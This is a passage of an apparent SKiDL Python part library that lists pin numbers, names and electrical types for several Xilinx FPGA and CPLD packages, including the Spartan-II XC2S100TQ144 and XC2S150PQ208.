Part(name='XC2C256-VQ100',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='XC2S100TQ144',dest=TEMPLATE,tool=SKIDL,keywords='FPGA',description='spartan 2',ref_prefix='U',num_units=1,do_erc=True,pins=[
Pin(num='1',name='VCCO',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='TCK',do_erc=True),
Pin(num='3',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='4',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='5',name='IO/VREF',func=Pin.BIDIR,do_erc=True),
Pin(num='6',name='IO/VREF',func=Pin.BIDIR,do_erc=True),
Pin(num='7',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='8',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='9',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='10',name='IO7P10',func=Pin.BIDIR,do_erc=True),
Pin(num='20',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='30',name='/WR',func=Pin.BIDIR,do_erc=True),
Pin(num='40',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='50',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='60',name='IO/D5',func=Pin.BIDIR,do_erc=True),
Pin(num='70',name='VCCO',func=Pin.PWRIN,do_erc=True),
Pin(num='80',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='90',name='VCCO',func=Pin.PWRIN,do_erc=True),
Pin(num='11',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='21',name='IO/VREF',func=Pin.BIDIR,do_erc=True),
Pin(num='31',name='/CS',func=Pin.BIDIR,do_erc=True),
Pin(num='41',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='51',name='IO/IRDY',func=Pin.BIDIR,do_erc=True),
Pin(num='61',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='71',name='VCCO',func=Pin.PWRIN,do_erc=True),
Pin(num='81',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='91',name='I/GCK1',do_erc=True),
Pin(num='12',name='IO/VREF',func=Pin.BIDIR,do_erc=True),
Pin(num='22',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='32',name='TDI',do_erc=True),
Pin(num='42',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='52',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='62',name='IO/D6',func=Pin.BIDIR,do_erc=True),
Pin(num='72',name='DONE',func=Pin.OPENCOLL,do_erc=True),
Pin(num='82',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='13',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='23',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='33',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='43',name='IO/VREF',func=Pin.BIDIR,do_erc=True),
Pin(num='53',name='VCCO',func=Pin.PWRIN,do_erc=True),
Pin(num='63',name='IO/VREF',func=Pin.BIDIR,do_erc=True),
Pin(num='73',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='83',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='93',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='14',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='24',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='34',name='TDO',func=Pin.OUTPUT,do_erc=True),
Pin(num='44',name='IO/D1',func=Pin.BIDIR,do_erc=True),
Pin(num='54',name='IO/TRDY',func=Pin.BIDIR,do_erc=True),
Pin(num='64',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='74',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='84',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='94',name='IO/VREF',func=Pin.BIDIR,do_erc=True),
Pin(num='15',name='I/GCK3',do_erc=True),
Pin(num='25',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='35',name='VCCO',func=Pin.PWRIN,do_erc=True),
Pin(num='45',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='65',name='IO/VREF',func=Pin.BIDIR,do_erc=True),
Pin(num='75',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='85',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='95',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='16',name='VCCO',func=Pin.PWRIN,do_erc=True),
Pin(num='26',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='36',name='VCCO',func=Pin.PWRIN,do_erc=True),
Pin(num='46',name='IO/D2',func=Pin.BIDIR,do_erc=True),
Pin(num='56',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='66',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='76',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='86',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='96',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='17',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='27',name='IO/VREF',func=Pin.BIDIR,do_erc=True),
Pin(num='37',name='CCLK',do_erc=True),
Pin(num='47',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='57',name='IO/D4',func=Pin.BIDIR,do_erc=True),
Pin(num='67',name='IO/D7',func=Pin.BIDIR,do_erc=True),
Pin(num='77',name='IO/VREF',func=Pin.BIDIR,do_erc=True),
Pin(num='87',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='18',name='I/GCK2',do_erc=True),
Pin(num='28',name='IO/REF',func=Pin.BIDIR,do_erc=True),
Pin(num='38',name='BUSY/DOUT',func=Pin.OUTPUT,do_erc=True),
Pin(num='48',name='IO/VREF',func=Pin.BIDIR,do_erc=True),
Pin(num='58',name='IO/VREF',func=Pin.BIDIR,do_erc=True),
Pin(num='68',name='INIT/IO',func=Pin.BIDIR,do_erc=True),
Pin(num='78',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='88',name='I/CCK0',do_erc=True),
Pin(num='98',name='GND',func=Pin.PASSIVE,do_erc=True),
Pin(num='19',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='29',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='39',name='D0/DIN',func=Pin.BIDIR,do_erc=True),
Pin(num='49',name='IO/D3',func=Pin.BIDIR,do_erc=True),
Pin(num='59',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='69',name='PROG',do_erc=True),
Pin(num='79',name='IO/VREF',func=Pin.BIDIR,do_erc=True),
Pin(num='89',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='99',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='100',name='IO/VREF',func=Pin.BIDIR,do_erc=True),
Pin(num='110',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='120',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='130',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='140',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='101',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='111',name='M1',do_erc=True),
Pin(num='121',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='131',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='141',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='102',name='IO/VREF',func=Pin.BIDIR,do_erc=True),
Pin(num='112',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='122',name='IO/VREF',func=Pin.BIDIR,do_erc=True),
Pin(num='132',name='IO/VREF',func=Pin.BIDIR,do_erc=True),
Pin(num='142',name='TMS',do_erc=True),
Pin(num='103',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='113',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='123',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='133',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='143',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='114',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='124',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='134',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='144',name='VCCO',func=Pin.PASSIVE,do_erc=True),
Pin(num='115',name='IO/VREF',func=Pin.BIDIR,do_erc=True),
Pin(num='125',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='135',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='106',name='M2',do_erc=True),
Pin(num='116',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='126',name='IO/TRDY',func=Pin.BIDIR,do_erc=True),
Pin(num='136',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='107',name='VCCO',func=Pin.PWRIN,do_erc=True),
Pin(num='117',name='IO/VREF',func=Pin.BIDIR,do_erc=True),
Pin(num='127',name='VCCO',func=Pin.PWRIN,do_erc=True),
Pin(num='137',name='139/VREF',func=Pin.BIDIR,do_erc=True),
Pin(num='108',name='VCCO',func=Pin.PWRIN,do_erc=True),
Pin(num='118',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='128',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='138',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='109',name='M0',do_erc=True),
Pin(num='119',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='129',name='IO/IRDY',func=Pin.BIDIR,do_erc=True),
Pin(num='139',name='IO/VREF',func=Pin.BIDIR,do_erc=True)]),
Part(name='XC2S150PQ208',dest=TEMPLATE,tool=SKIDL,keywords='FPGA',ref_prefix='U',num_units=1,do_erc=True,pins=[
Pin(num='1',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='TMS',func=Pin.BIDIR,do_erc=True),
Pin(num='3',name='IO7P3',func=Pin.BIDIR,do_erc=True),
Pin(num='4',name='IO7P4',func=Pin.BIDIR,do_erc=True),
Pin(num='5',name='IO7P5',func=Pin.BIDIR,do_erc=True),
Pin(num='6',name='IO7VRP6',func=Pin.BIDIR,do_erc=True),
Pin(num='7',name='IO7P7',func=Pin.BIDIR,do_erc=True),
Pin(num='8',name='IO7P8',func=Pin.BIDIR,do_erc=True),
Pin(num='9',name='IO7P9',func=Pin.BIDIR,do_erc=True),
Pin(num='10',name='IO7P10',func=Pin.BIDIR,do_erc=True),
Pin(num='20',name='IO7VRP20',func=Pin.BIDIR,do_erc=True),
Pin(num='30',name='IO6P30',func=Pin.BIDIR,do_erc=True),
Pin(num='40',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='50',name='M1',do_erc=True),
Pin(num='60',name='IO5P60',func=Pin.BIDIR,do_erc=True),
Pin(num='70',name='IO5P70',func=Pin.BIDIR,do_erc=True),
Pin(num='80',name='GCK0',do_erc=True),
Pin(num='90',name='IO4P90',func=Pin.BIDIR,do_erc=True),
Pin(num='11',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='21',name='IO7P21',func=Pin.BIDIR,do_erc=True),
Pin(num='31',name='IO6VRP31',func=Pin.BIDIR,do_erc=True),
Pin(num='41',name='IO6P41',func=Pin.BIDIR,do_erc=True),
Pin(num='51',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='61',name='IO5P61',func=Pin.BIDIR,do_erc=True),
Pin(num='71',name='IO5P71',func=Pin.BIDIR,do_erc=True),
Pin(num='81',name='IO4P81',func=Pin.BIDIR,do_erc=True),
Pin(num='91',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='12',name='VCCO',func=Pin.PWRIN,do_erc=True),
Pin(num='22',name='IO7P22',func=Pin.BIDIR,do_erc=True),
Pin(num='32',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='42',name='IO6P42',func=Pin.BIDIR,do_erc=True),
Pin(num='52',name='M0',do_erc=True),
Pin(num='62',name='IO5P62',func=Pin.BIDIR,do_erc=True),
Pin(num='72',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='82',name='IO4P82',func=Pin.BIDIR,do_erc=True),
Pin(num='92',name='VCCO',func=Pin.PWRIN,do_erc=True),
Pin(num='13',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='23',name='IO7P23',func=Pin.BIDIR,do_erc=True),
Pin(num='33',name='IO6P33',func=Pin.BIDIR,do_erc=True),
Pin(num='43',name='IO6P43',func=Pin.BIDIR,do_erc=True),
Pin(num='53',name='VCCO',func=Pin.PWRIN,do_erc=True),
Pin(num='63',name='IO5P63',func=Pin.BIDIR,do_erc=True),
Pin(num='73',name='IO5VRP73',func=Pin.BIDIR,do_erc=True),
Pin(num='83',name='IO4P83',func=Pin.BIDIR,do_erc=True),
Pin(num='93',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='14',name='IO7P14',func=Pin.BIDIR,do_erc=True),
Pin(num='24',name='IRDY7',func=Pin.BIDIR,do_erc=True),
Pin(num='34',name='IO6P34',func=Pin.BIDIR,do_erc=True),
Pin(num='44',name='IO6P44',func=Pin.BIDIR,do_erc=True),
Pin(num='54',name='M2',do_erc=True),
Pin(num='64',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='74',name='IO5P74',func=Pin.BIDIR,do_erc=True),
Pin(num='84',name='IO4VRP84',func=Pin.BIDIR,do_erc=True),
Pin(num='94',name='IO4P94',func=Pin.BIDIR,do_erc=True),
Pin(num='15',name='IO7P15',func=Pin.BIDIR,do_erc=True),
Pin(num='25',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='35',name='IO6P35',func=Pin.BIDIR,do_erc=True),
Pin(num='45',name='IO6VRP45',func=Pin.BIDIR,do_erc=True),
Pin(num='65',name='VCCO',func=Pin.PWRIN,do_erc=True),
Pin(num='85',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='95',name='IO4P95',func=Pin.BIDIR,do_erc=True),
Pin(num='16',name='IO7P16',func=Pin.BIDIR,do_erc=True),
Pin(num='26',name='VCCO',func=Pin.PWRIN,do_erc=True),
Pin(num='36',name='IO6P36',func=Pin.BIDIR,do_erc=True),
Pin(num='46',name='IO6P46',func=Pin.BIDIR,do_erc=True),
Pin(num='66',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='76',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='86',name='IO4P86',func=Pin.BIDIR,do_erc=True),
Pin(num='96',name='IO4P96',func=Pin.BIDIR,do_erc=True),
Pin(num='17',name='IO7P17',func=Pin.BIDIR,do_erc=True),
Pin(num='27',name='TRDY6',func=Pin.BIDIR,do_erc=True),
Pin(num='37',name='IO6P37',func=Pin.BIDIR,do_erc=True),
Pin(num='47',name='IO6P47',func=Pin.BIDIR,do_erc=True),
Pin(num='57',name='IO5P57',func=Pin.BIDIR,do_erc=True),
Pin(num='67',name='IO5P67',func=Pin.BIDIR,do_erc=True),
Pin(num='77',name='GCK1',do_erc=True),
Pin(num='87',name='IO4P87',func=Pin.BIDIR,do_erc=True),
Pin(num='97',name='IO4P97',func=Pin.BIDIR,do_erc=True),
Pin(num='18',name='IO7P18',func=Pin.BIDIR,do_erc=True),
Pin(num='28',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='38',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='48',name='IO6P48',func=Pin.BIDIR,do_erc=True),
Pin(num='58',name='IO5P58',func=Pin.BIDIR,do_erc=True),
Pin(num='68',name='IO5P68',func=Pin.BIDIR,do_erc=True),
Pin(num='78',name='VCCO',func=Pin.PWRIN,do_erc=True),
Pin(num='88',name='IO4P88',func=Pin.BIDIR,do_erc=True),
Pin(num='98',name='IO4VRP98',func=Pin.BIDIR,do_erc=True),
Pin(num='19',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='29',name='IO6P29',func=Pin.BIDIR,do_erc=True),
Pin(num='39',name='VCCO',func=Pin.PWRIN,do_erc=True),
Pin(num='49',name='IO6P49',func=Pin.BIDIR,do_erc=True),
Pin(num='59',name='IO5VRP59',func=Pin.BIDIR,do_erc=True),
Pin(num='69',name='IO5P69',func=Pin.BIDIR,do_erc=True),
Pin(num='79',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='89',name='IO4P89',func=Pin.BIDIR,do_erc=True),
Pin(num='99',name='IO4P99',func=Pin.BIDIR,do_erc=True),
Pin(num='100',name='IO4P100',func=Pin.BIDIR,do_erc=True),
Pin(num='200',name='IO0P200',func=Pin.BIDIR,do_erc=True),
Pin(num='110',name='IO3P110',func=Pin.BIDIR,do_erc=True),
Pin(num='120',name='IO3P120',func=Pin.BIDIR,do_erc=True),
Pin(num='130',name='VCCO',func=Pin.PWRIN,do_erc=True),
Pin(num='140',name='IO2P140',func=Pin.BIDIR,do_erc=True),
Pin(num='150',name='IO2VRP150',func=Pin.BIDIR,do_erc=True),
Pin(num='160',name='/CS',func=Pin.BIDIR,do_erc=True),
Pin(num='170',name='VCCO',func=Pin.PWRIN,do_erc=True),
Pin(num='180',name='IO1P180',func=Pin.BIDIR,do_erc=True),
Pin(num='190',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='101',name='IO4P101',func=Pin.BIDIR,do_erc=True),
Pin(num='201',name='IO0P201',func=Pin.BIDIR,do_erc=True),
Pin(num='111',name='IO3VRP111',func=Pin.BIDIR,do_erc=True),
Pin(num='121',name='IO3P121',func=Pin.BIDIR,do_erc=True),
Pin(num='131',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='141',name='IO2P141',func=Pin.BIDIR,do_erc=True),
Pin(num='151',name='IO2P151',func=Pin.BIDIR,do_erc=True),
Pin(num='161',name='/WR',func=Pin.BIDIR,do_erc=True),
Pin(num='171',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='181',name='IO1P181',func=Pin.BIDIR,do_erc=True),
Pin(num='191',name='IO0P191',func=Pin.BIDIR,do_erc=True),
Pin(num='102',name='IO4P102',func=Pin.BIDIR,do_erc=True),
Pin(num='202',name='IO0P202',func=Pin.BIDIR,do_erc=True),
Pin(num='112',name='IO3P112',func=Pin.BIDIR,do_erc=True),
Pin(num='122',name='IO3P122',func=Pin.BIDIR,do_erc=True),
Pin(num='132',name='IRDY2',func=Pin.BIDIR,do_erc=True),
Pin(num='142',name='IO2/D2P142',func=Pin.BIDIR,do_erc=True),
Pin(num='152',name='IO2P152',func=Pin.BIDIR,do_erc=True),
Pin(num='162',name='IO1P162',func=Pin.BIDIR,do_erc=True),
Pin(num='172',name='IO1P172',func=Pin.BIDIR,do_erc=True),
Pin(num='182',name='GCK2',do_erc=True),
Pin(num='192',name='IO0P192',func=Pin.BIDIR,do_erc=True),
Pin(num='103',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='203',name='IO0VRP203',func=Pin.BIDIR,do_erc=True),
Pin(num='113',name='IO3P113',func=Pin.BIDIR,do_erc=True),
Pin(num='123',name='IO3P123',func=Pin.BIDIR,do_erc=True),
Pin(num='133',name='IO2P133',func=Pin.BIDIR,do_erc=True),
Pin(num='143',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='153',name='D0/DIN',func=Pin.BIDIR,do_erc=True),
Pin(num='163',name='IO1P163',func=Pin.BIDIR,do_erc=True),
Pin(num='173',name='IO1P173',func=Pin.BIDIR,do_erc=True),
Pin(num='183',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='193',name='IO0P193',func=Pin.BIDIR,do_erc=True),
Pin(num='104',name='DONE',func=Pin.BIDIR,do_erc=True),
Pin(num='204',name='IO0P204',func=Pin.BIDIR,do_erc=True),
Pin(num='114',name='IO3P114',func=Pin.BIDIR,do_erc=True),
Pin(num='124',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='134',name='IO2P134',func=Pin.BIDIR,do_erc=True),
Pin(num='144',name='VCCO',func=Pin.PWRIN,do_erc=True),
Pin(num='154',name='BUSY/DOUT',func=Pin.BIDIR,do_erc=True),
Pin(num='164',name='IO1VRP164',func=Pin.BIDIR,do_erc=True),
Pin(num='174',name='IO1P174',func=Pin.BIDIR,do_erc=True),
Pin(num='184',name='VCCO',func=Pin.PWRIN,do_erc=True),
Pin(num='194',name='IO0P194',func=Pin.BIDIR,do_erc=True),
Pin(num='105',name='VCCO',func=Pin.PWRIN,do_erc=True),
Pin(num='205',name='IO0P205',func=Pin.BIDIR,do_erc=True),
Pin(num='115',name='IO3/D6P115',func=Pin.BIDIR,do_erc=True),
Pin(num='125',name='IO3VRP125',func=Pin.BIDIR,do_erc=True),
Pin(num='135',name='IO2/D3P135',func=Pin.BIDIR,do_erc=True),
Pin(num='145',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='155',name='CCLK',func=Pin.BIDIR,do_erc=True),
Pin(num='165',name='IO1P165',func=Pin.BIDIR,do_erc=True),
Pin(num='175',name='IO1P175',func=Pin.BIDIR,do_erc=True),
Pin(num='185',name='GCK3',do_erc=True),
Pin(num='195',name='IO0P195',func=Pin.BIDIR,do_erc=True),
Pin(num='106',name='/PROG',do_erc=True),
Pin(num='206',name='IO0P206',func=Pin.BIDIR,do_erc=True),
Pin(num='116',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='126',name='IO3/D4P126',func=Pin.BIDIR,do_erc=True),
Pin(num='136',name='IO2VRP136',func=Pin.BIDIR,do_erc=True),
Pin(num='146',name='IO2/D1P46',func=Pin.BIDIR,do_erc=True),
Pin(num='156',name='VCCO',func=Pin.PWRIN,do_erc=True),
Pin(num='166',name='IO1P166',func=Pin.BIDIR,do_erc=True),
Pin(num='176',name='IO1P176',func=Pin.BIDIR,do_erc=True),
Pin(num='186',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='196',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='107',name='/INIT',func=Pin.BIDIR,do_erc=True),
Pin(num='207',name='TCK',func=Pin.BIDIR,do_erc=True),
Pin(num='117',name='VCCO',func=Pin.PWRIN,do_erc=True),
Pin(num='127',name='IO3P127',func=Pin.BIDIR,do_erc=True),
Pin(num='137',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='147',name='IO2P147',func=Pin.BIDIR,do_erc=True),
Pin(num='157',name='TDO',func=Pin.BIDIR,do_erc=True),
Pin(num='167',name='IO1P167',func=Pin.BIDIR,do_erc=True),
Pin(num='177',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='187',name='IO0P187',func=Pin.BIDIR,do_erc=True),
Pin(num='197',name='VCCO',func=Pin.PWRIN,do_erc=True),
Pin(num='108',name='IO3/D7P108',func=Pin.BIDIR,do_erc=True),
Pin(num='208',name='VCCO',func=Pin.PWRIN,do_erc=True),
Pin(num='118',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='128',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='138',name='IO2P138',func=Pin.BIDIR,do_erc=True),
Pin(num='148',name='IO2P148',func=Pin.BIDIR,do_erc=True),
Pin(num='158',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='168',name='IO1P168',func=Pin.BIDIR,do_erc=True),
Pin(num='178',name='IO1VRP178',func=Pin.BIDIR,do_erc=True),
Pin(num='188',name='IO0P188',func=Pin.BIDIR,do_erc=True),
Pin(num='198',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='109',name='IO3P109',func=Pin.BIDIR,do_erc=True),
Pin(num='119',name='IO3/D5P119',func=Pin.BIDIR,do_erc=True),
Pin(num='129',name='TRDY3',func=Pin.BIDIR,do_erc=True),
Pin(num='139',name='IO2P139',func=Pin.BIDIR,do_erc=True),
Pin(num='149',name='IO2P149',func=Pin.BIDIR,do_erc=True),
Pin(num='159',name='TDI',func=Pin.BIDIR,do_erc=True),
Pin(num='169',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='179',name='IO1P179',func=Pin.BIDIR,do_erc=True),
Pin(num='189',name='IO0VRP189',func=Pin.BIDIR,do_erc=True),
Pin(num='199',name='IO0P199',func=Pin.BIDIR,do_erc=True)]),
Part(name='XC2S200PQ208',dest=TEMPLATE,tool=SKIDL,keywords='FPGA',ref_prefix='U',num_units=1,do_erc=True,pins=[
Pin(num='1',name='GND',func=Pin.PASSIVE,do_erc=True),
Pin(num='2',name='TMS',func=Pin.BIDIR,do_erc=True),
Pin(num='3',name='IO7P3',func=Pin.BIDIR,do_erc=True),
Pin(num='4',name='IO7VRP4',func=Pin.BIDIR,do_erc=True),
Pin(num='5',name='IO7P5',func=Pin.BIDIR,do_erc=True),
Pin(num='6',name='IO7VRP6',func=Pin.BIDIR,do_erc=True),
Pin(num='7',name='IO7P7',func=Pin.BIDIR,do_erc=True),
Pin(num='8',name='IO7P8',func=Pin.BIDIR,do_erc=True),
Pin(num='9',name='IO7VRP9',func=Pin.BIDIR,do_erc=True),
Pin(num='10',name='IO7P10',func=Pin.BIDIR,do_erc=True),
Pin(num='20',name='IO7VRP20',func=Pin.BIDIR,do_erc=True),
Pin(num='30',name='IO6P30',func=Pin.BIDIR,do_erc=True),
Pin(num='40',name='GND',func=Pin.PASSIVE,do_erc=True),
Pin(num='50',name='M1',do_erc=True),
Pin(num='60',name='IO5P60',func=Pin.BIDIR,do_erc=True),
Pin(num='70',name='IO5P70',func=Pin.BIDIR,do_erc=True),
Pin(num='80',name='GCK0',do_erc=True),
Pin(num='90',name='IO4P90',func=Pin.BIDIR,do_erc=True),
Pin(num='11',name='GND',func=Pin.PASSIVE,do_erc=True),
Pin(num='21',name='IO7P21',func=Pin.BIDIR,do_erc=True),
Pin(num='31',name='IO6VRP31',func=Pin.BIDIR,do_erc=True),
Pin(num='41',name='IO6P41',func=Pin.BIDIR,do_erc=True),
Pin(num='51',name='GND',func=Pin.PASSIVE,do_erc=True),
Pin(num='61',name='IO5P61',func=Pin.BIDIR,do_erc=True),
Pin(num='71',name='IO5P71',func=Pin.BIDIR,do_erc=True),
Pin(num='81',name='IO4P81',func=Pin.BIDIR,do_erc=True),
Pin(num='91',name='VCCINT',func=Pin.PASSIVE,do_erc=True),
Pin(num='12',name='VCCO',func=Pin.PASSIVE,do_erc=True),
Pin(num='22',name='IO7P22',func=Pin.BIDIR,do_erc=True),
Pin(num='32',name='GND',func=Pin.PASSIVE,do_erc=True),
Pin(num='42',name='IO6VRP42',func=Pin.BIDIR,do_erc=True),
Pin(num='52',name='M0',do_erc=True),
Pin(num='62',name='IO5VRP62',func=Pin.BIDIR,do_erc=True),
Pin(num='72',name='GND',func=Pin.PASSIVE,do_erc=True),
Pin(num='82',name='IO4P82',func=Pin.BIDIR,do_erc=True),
Pin(num='92',name='VCCO',func=Pin.PASSIVE,do_erc=True),
Pin(num='13',name='VCCINT',func=Pin.PASSIVE,do_erc=True),
Pin(num='23',name='IO7P23',func=Pin.BIDIR,do_erc=True),
Pin(num='33',name='IO6P33',func=Pin.BIDIR,do_erc=True),
Pin(num='43',name='IO6P43',func=Pin.BIDIR,do_erc=True),
Pin(num='53',name='VCCO',func=Pin.PASSIVE,do_erc=True),
Pin(num='63',name='IO5P63',func=Pin.BIDIR,do_erc=True),
Pin(num='73',name='IO5VRP73',func=Pin.BIDIR,do_erc=True),
Pin(num='83',name='IO4P83',func=Pin.BIDIR,do_erc=True),
Pin(num='93',name='GND',func=Pin.PASSIVE,do_erc=True),
Pin(num='14',name='IO7P14',func=Pin.BIDIR,do_erc=True),
Pin(num='24',name='IRDY7',func=Pin.BIDIR,do_erc=True),
Pin(num='34',name='IO6P34',func=Pin.BIDIR,do_erc=True),
Pin(num='44',name='IO6P44',func=Pin.BIDIR,do_erc=True),
Pin(num='54',name='M2',do_erc=True),
Pin(num='64',name='GND',func=Pin.PASSIVE,do_erc=True),
Pin(num='74',name='IO5P74',func=Pin.BIDIR,do_erc=True),
Pin(num='84',name='IO4VRP84',func=Pin.BIDIR,do_erc=True),
Pin(num='94',name='IO4P94',func=Pin.BIDIR,do_erc=True),
Pin(num='15',name='IO7P15',func=Pin.BIDIR,do_erc=True),
Pin(num='25',name='GND',func=Pin.PASSIVE,do_erc=True),
Pin(num='35',name='IO6P35',func=Pin.BIDIR,do_erc=True),
Pin(num='45',name='IO6VRP45',func=Pin.BIDIR,do_erc=True),
Pin(num='65',name='VCCO',func=Pin.PASSIVE,do_erc=True),
Pin(num='75',name='IO5P75',func=Pin.BIDIR,do_erc=True),
Pin(num='85',name='GND',func=Pin.PASSIVE,do_erc=True),
Pin(num='95',name='IO4VRP95',func=Pin.BIDIR,do_erc=True),
Pin(num='16',name='IO7P16',func=Pin.BIDIR,do_erc=True),
Pin(num='26',name='VCCO',func=Pin.PASSIVE,do_erc=True),
Pin(num='36',name='IO6P36',func=Pin.BIDIR,do_erc=True),
Pin(num='46',name='IO6P46',func=Pin.BIDIR,do_erc=True),
Pin(num='66',name='VCCINT',func=Pin.PASSIVE,do_erc=True),
Pin(num='76',name='VCCINT',func=Pin.PASSIVE,do_erc=True),
Pin(num='86',name='IO4P86',func=Pin.BIDIR,do_erc=True),
Pin(num='96',name='IO4P96',func=Pin.BIDIR,do_erc=True),
Pin(num='17',name='IO7P17',func=Pin.BIDIR,do_erc=True),
Pin(num='27',name='TRDY6',func=Pin.BIDIR,do_erc=True),
Pin(num='37',name='IO6P37',func=Pin.BIDIR,do_erc=True),
Pin(num='47',name='IO6VRP47',func=Pin.BIDIR,do_erc=True),
Pin(num='57',name='IO5VRP57',func=Pin.BIDIR,do_erc=True),
Pin(num='67',name='IO5P67',func=Pin.BIDIR,do_erc=True),
Pin(num='77',name='GCK1',do_erc=True),
Pin(num='87',name='IO4P87',func=Pin.BIDIR,do_erc=True),
Pin(num='97',name='IO4P97',func=Pin.BIDIR,do_erc=True),
Pin(num='18',name='IO7P18',func=Pin.BIDIR,do_erc=True),
